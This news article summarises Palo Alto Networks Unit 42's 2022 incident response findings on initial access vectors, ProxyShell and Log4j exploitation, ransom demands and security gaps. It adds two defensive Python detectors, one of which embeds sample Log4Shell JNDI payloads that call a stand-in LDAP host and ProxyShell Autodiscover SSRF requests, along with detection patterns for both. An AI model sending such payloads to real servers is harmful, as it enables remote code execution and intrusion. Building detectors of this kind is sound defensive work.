ProxyShell and Log4j Vulnerabilities Were the Most Exploited Flaws in 2021: Study

essidsolutions

Phishing, the exploitation of known software vulnerabilities, and brute-force credential attacks are the three primary vectors cybercriminals use to get into networks, according to the 2022 Incident Response report from Palo Alto Networks' Unit 42.

The most likely initial entry point into a target organization's network is phishing, followed by the exploitation of known software vulnerabilities; between them, these two vectors accounted for 68% of the suspected intrusions.

Credentials remain a problem too, whether they are guessed or stolen in advance. Brute-force credential attacks, mostly against the remote desktop protocol (RDP), accounted for 9% of cases, and the use of previously compromised credentials for another 6%, according to the report.

Commonly Used Attack Vectors | Source: Palo Alto Networks Unit 42

Phishing has consistently remained one of the top vectors for gaining initial access to target networks. It relies on social engineering, typically by creating a sense of urgency that pushes an employee to complete a task. Exploiting a vulnerability, by contrast, is a more technical undertaking whose difficulty varies widely from flaw to flaw.

For instance, the Log4Shell vulnerabilities (CVE-2021-44228, CVE-2021-45046, and CVE-2021-44832) in the Apache Log4j logging library are expected to linger in unpatched systems for as long as a decade. In the period the report covers, Log4j flaws accounted for 14% of the exploitation incidents Unit 42 investigated. "Log4Shell was rated 10 on the Common Vulnerability Scoring System (CVSS)—the highest possible score," Unit 42 said; that score applies to the original flaw, CVE-2021-44228.


“And while Apache Log4j 2 may not have been a household name outside the technical community, the software underlies a large number of well-known services and systems. Organizations all over the globe had vulnerable systems (whether or not they knew it), and mass scanning activities seeking these vulnerable systems began almost immediately.”

The ProxyShell chain in Microsoft Exchange Server (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207) was the most exploited, accounting for 55% of the exploitation cases.

Exploited Vulnerabilities in Unit 42 Cases | Source: Unit 42
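The mass scanning Unit 42 describes for both of these flaws leaves a recognizable trail in ordinary web server logs. The script below is an added example, not code from the article or from Unit 42: it parses a handful of constructed Combined Log Format lines (the IP addresses, hostnames and timestamps are made up), undoes the URL encoding and Log4j lookup tricks (`${lower:j}`, `${::-j}`) that attackers wrap around `${jndi:` to defeat naive string matching, and flags the Autodiscover request shape used to reach Exchange back-end endpoints in ProxyShell attacks. The rule names and the `Finding` type are this example's own.

```python
import re
import urllib.parse
from dataclasses import dataclass
from typing import List

# Constructed access-log lines in Combined Log Format (not from the report).
# Lines 1-3 carry Log4Shell probes (plain, lookup-obfuscated, URL-encoded),
# lines 4-5 ProxyShell-style Autodiscover SSRF requests, lines 6-7 are benign.
SAMPLE_LOG = """\
203.0.113.10 - - [11/Dec/2021:03:14:07 +0000] "GET /login?user=${jndi:ldap://203.0.113.99:1389/a} HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.99:1389/a}"
203.0.113.11 - - [11/Dec/2021:03:14:09 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "${${lower:j}ndi:${lower:l}${lower:d}ap://203.0.113.99:1389/b}"
203.0.113.12 - - [11/Dec/2021:03:15:01 +0000] "GET /api?q=%24%7B%24%7B%3A%3A-j%7Dndi%3Aldap%3A%2F%2F203.0.113.99%2Fc%7D HTTP/1.1" 404 0 "-" "curl/7.68.0"
198.51.100.7 - - [07/Aug/2021:11:02:44 +0000] "GET /autodiscover/autodiscover.json?@evil.corp/mapi/nspi/?&Email=autodiscover/autodiscover.json%3f@evil.corp HTTP/1.1" 200 2048 "-" "python-requests/2.25.1"
198.51.100.8 - - [07/Aug/2021:11:03:10 +0000] "POST /autodiscover/autodiscover.json?@evil.corp/powershell/ HTTP/1.1" 200 128 "-" "python-requests/2.25.1"
192.0.2.5 - - [07/Aug/2021:11:05:00 +0000] "GET /autodiscover/autodiscover.json HTTP/1.1" 200 768 "-" "Microsoft Office/16.0"
192.0.2.6 - - [11/Dec/2021:03:16:00 +0000] "GET /docs/log4j-faq.html?ref=${date:yyyy} HTTP/1.1" 200 300 "-" "Mozilla/5.0"
"""

_CLF = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Log4j lookups attackers wrap around "jndi" to evade naive string matching:
# ${lower:j} / ${upper:J} resolve to the letter, ${env:X:-j} and ${::-j} to the default.
_CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.I)
_DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")
_JNDI = re.compile(r"\$\{jndi:(?P<scheme>[a-z0-9+.-]+):")
# ProxyShell SSRF shape: autodiscover.json, then "@host/" and a back-end path.
_PROXYSHELL = re.compile(r"autodiscover/autodiscover\.json[^ ]*?@[^ /]+/(?P<backend>[a-z]+)")


def url_decode(value: str, rounds: int = 3) -> str:
    """Undo up to `rounds` layers of percent-encoding (double encoding is common)."""
    for _ in range(rounds):
        decoded = urllib.parse.unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def normalize(value: str) -> str:
    """Decode and collapse Log4j lookup obfuscation so a ${jndi: prefix becomes visible."""
    value = url_decode(value)
    previous = None
    while previous != value:  # nested wrappers need several passes
        previous = value
        value = _CASE_LOOKUP.sub(lambda m: m.group(1), value)
        value = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), value)
    return value.lower()


@dataclass(frozen=True)
class Finding:
    src_ip: str
    rule: str  # "log4shell" or "proxyshell"
    detail: str


def inspect_line(line: str) -> List[Finding]:
    """Return the findings for one log line (empty if it does not parse or is clean)."""
    m = _CLF.match(line)
    if not m:
        return []
    findings: List[Finding] = []
    # JNDI strings get injected wherever the application might log attacker input,
    # so check the request target, the Referer and the User-Agent.
    for field in ("target", "ref", "ua"):
        hit = _JNDI.search(normalize(m.group(field)))
        if hit:
            findings.append(Finding(m.group("ip"), "log4shell",
                                    f"jndi lookup via {hit.group('scheme')} in {field}"))
            break
    hit = _PROXYSHELL.search(normalize(m.group("target")))
    if hit:
        findings.append(Finding(m.group("ip"), "proxyshell",
                                f"autodiscover ssrf towards backend /{hit.group('backend')}"))
    return findings


def scan_log(text: str) -> List[Finding]:
    return [f for line in text.splitlines() if line.strip() for f in inspect_line(line)]


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(f"{finding.src_ip:15} {finding.rule:10} {finding.detail}")
```

Run against the embedded sample, the script reports three Log4Shell probes (one hidden in the User-Agent, one double-wrapped in lookups, one percent-encoded) and two ProxyShell requests, while the legitimate Autodiscover call and the page whose URL merely contains "log4j" and a `${date:...}` parameter pass clean. The normalization step is the part worth keeping: matching on the literal string `${jndi:` alone misses two of the three probes.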

Once the organizational perimeter is breached, threat actors are most likely to carry out ransomware attacks (36%), business email compromises (34%) and network intrusion (14%). Besides these three, other incidents that Palo Alto Networks responded to were insider threats (5%), extortion without encryption (4%), exposure investigation (1%), PCI investigation (1%), and web app compromise (1%).

The industries attackers targeted most were those that store, process, and transmit large volumes of monetizable sensitive information. In descending order, the most widely targeted were finance, professional and legal services, manufacturing, healthcare, high tech, wholesale and retail, education, and hospitality.

Target selection also depends on how badly a victim needs to avoid operational disruption (and is therefore likely to pay), on whether it runs software with known vulnerabilities, or simply on whether the threat actors stumbled on a weakness while scanning the internet.

Scanning the internet for vulnerabilities is a ransomware favorite, according to Unit 42. In its 2022 Attack Surface Management Threat report, the company noted that attackers start scanning for a vulnerability within 15 minutes of a CVE being announced. Software vulnerabilities were also the most common initial access vector in ransomware cases, at 48%.

Average ransom demands were highest in finance, at $7.96 million, followed by real estate at $5.2 million.


Average Ransom Demand by Industry | Source: Unit 42

Between March 2021 and April 2022, the highest ransom paid by a victim was $8 million, while the highest demand was $30 million. The average ransom demand ($7.86 million) dwarfs the average amount stolen in a BEC attack ($286,000). Since vulnerability exploitation is the leading way ransomware operators get in, patching known flaws should be a top priority for organizations.

When Unit 42 reviewed how successful attacks had happened, the gaps it found most often were:

  • Lack of multi-factor authentication (50% of cases)
  • Lack of endpoint detection and response (EDR) or extended detection and response (XDR) (44%)
  • Poor patch management (28%)
  • No mitigations for brute-force attacks (13%)
  • Ignoring security alerts (11%)
  • Weak password security practices (7%)
  • System misconfiguration (7%)
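The brute-force item above is the one gap that is cheap to close with detection alone, since the report notes that such attacks mostly target RDP and are usually visible as a burst of failed logons from one source. The code below is an added example, not something from the article or from Unit 42: it runs a sliding-window count over constructed logon events (the shape of Windows events 4625/4624, with made-up IP addresses and account names), and raises one alert for a password-guessing burst against a single account, a separate alert when one source fails against many different accounts (a spray), and a third, higher-priority alert when a success follows such a burst, which is the "compromised credentials" outcome the report counts separately. The thresholds and alert names are this example's own choices.

```python
from collections import defaultdict, deque
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Deque, Dict, List, Set, Tuple


@dataclass(frozen=True)
class LogonEvent:
    ts: datetime
    src_ip: str
    account: str
    success: bool  # False stands for Windows event 4625, True for 4624


@dataclass(frozen=True)
class Alert:
    src_ip: str
    kind: str  # "bruteforce", "spray" or "success_after_burst"
    ts: datetime
    detail: str


def _build_sample_events() -> List[LogonEvent]:
    """Constructed events (not real telemetry) covering three sources."""
    t0 = datetime(2022, 3, 1, 2, 0, 0)
    events: List[LogonEvent] = []
    # 203.0.113.10: 12 failures against one account in two minutes, then a success.
    for i in range(12):
        events.append(LogonEvent(t0 + timedelta(seconds=10 * i), "203.0.113.10", "administrator", False))
    events.append(LogonEvent(t0 + timedelta(seconds=130), "203.0.113.10", "administrator", True))
    # 198.51.100.7: one failure each against 12 different accounts in three minutes.
    for i in range(12):
        events.append(LogonEvent(t0 + timedelta(seconds=15 * i), "198.51.100.7", f"user{i:02d}", False))
    # 192.0.2.5: three typos spread over half an hour, then a success (a normal user).
    for i in range(3):
        events.append(LogonEvent(t0 + timedelta(minutes=10 * i), "192.0.2.5", "jdoe", False))
    events.append(LogonEvent(t0 + timedelta(minutes=31), "192.0.2.5", "jdoe", True))
    return events


SAMPLE_EVENTS = _build_sample_events()


def detect_bruteforce(events: List[LogonEvent], threshold: int = 10,
                      window: timedelta = timedelta(minutes=5)) -> List[Alert]:
    """Sliding-window failed-logon detection keyed on the source address."""
    failures: Dict[str, Deque[LogonEvent]] = defaultdict(deque)
    alerted: Set[Tuple[str, str]] = set()  # (src_ip, kind) pairs already raised
    alerts: List[Alert] = []

    for e in sorted(events, key=lambda x: x.ts):
        recent = failures[e.src_ip]
        while recent and e.ts - recent[0].ts > window:  # expire old failures
            recent.popleft()
        if not e.success:
            recent.append(e)
            if len(recent) >= threshold:
                accounts = {f.account for f in recent}
                # Many distinct accounts from one source is a spray, not a guess at one login.
                kind = "spray" if len(accounts) >= threshold // 2 else "bruteforce"
                if (e.src_ip, kind) not in alerted:
                    alerted.add((e.src_ip, kind))
                    alerts.append(Alert(e.src_ip, kind, e.ts,
                                        f"{len(recent)} failures against {len(accounts)} account(s) within {window}"))
        elif len(recent) >= threshold:
            # A success right after a burst is the signal that the guessing worked.
            key = (e.src_ip, "success_after_burst")
            if key not in alerted:
                alerted.add(key)
                alerts.append(Alert(e.src_ip, "success_after_burst", e.ts,
                                    f"successful logon as {e.account} after {len(recent)} failures"))
    return alerts


if __name__ == "__main__":
    for a in detect_bruteforce(SAMPLE_EVENTS):
        print(f"{a.ts:%H:%M:%S} {a.src_ip:15} {a.kind:20} {a.detail}")
```

On the sample, the first source produces a "bruteforce" alert at its tenth failure and a "success_after_burst" alert twenty seconds later, the second produces a single "spray" alert, and the user who mistyped a password three times in half an hour produces nothing. In production the same logic belongs in the SIEM, and the report's point stands: an account lockout or rate-limiting policy in front of RDP would have stopped the first two sources before detection was even needed.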

“Consider this list a reverse-engineered set of recommendations based on our case observations from the past year. If you ensure your organization addresses the issues below before an incident occurs, you can discourage threat actors who are after low-hanging fruit,” Unit 42 noted. “If threat actors do try to attack your systems, they’ll have a harder task ahead.”

What lies ahead

Incident responders made the following predictions:

  1. Attackers are actively hunting for new vulnerabilities, so the window organizations have to patch them will keep shrinking.
  2. Carrying out cyberattacks will take less skill and effort, so the threat from unskilled threat actors is increasing.
  3. Cryptocurrency volatility and uncertainty could push threat actors back toward fiat-currency crimes such as BEC and credit card fraud.
  4. As with traditional crime, a weak economy could push more people into cybercrime.
  5. Geopolitical turmoil could shape cyberattacks and make them politically motivated, as already seen when the Russia-Ukraine conflict broke out.

Note: The 2022 Incident Response report by Palo Alto Networks Unit 42 is based on 600 incident response cases completed between March 2021 and April 2022, at organizations ranging from those with fewer than 50 personnel to Fortune 500 companies and government bodies with more than 50,000 employees.

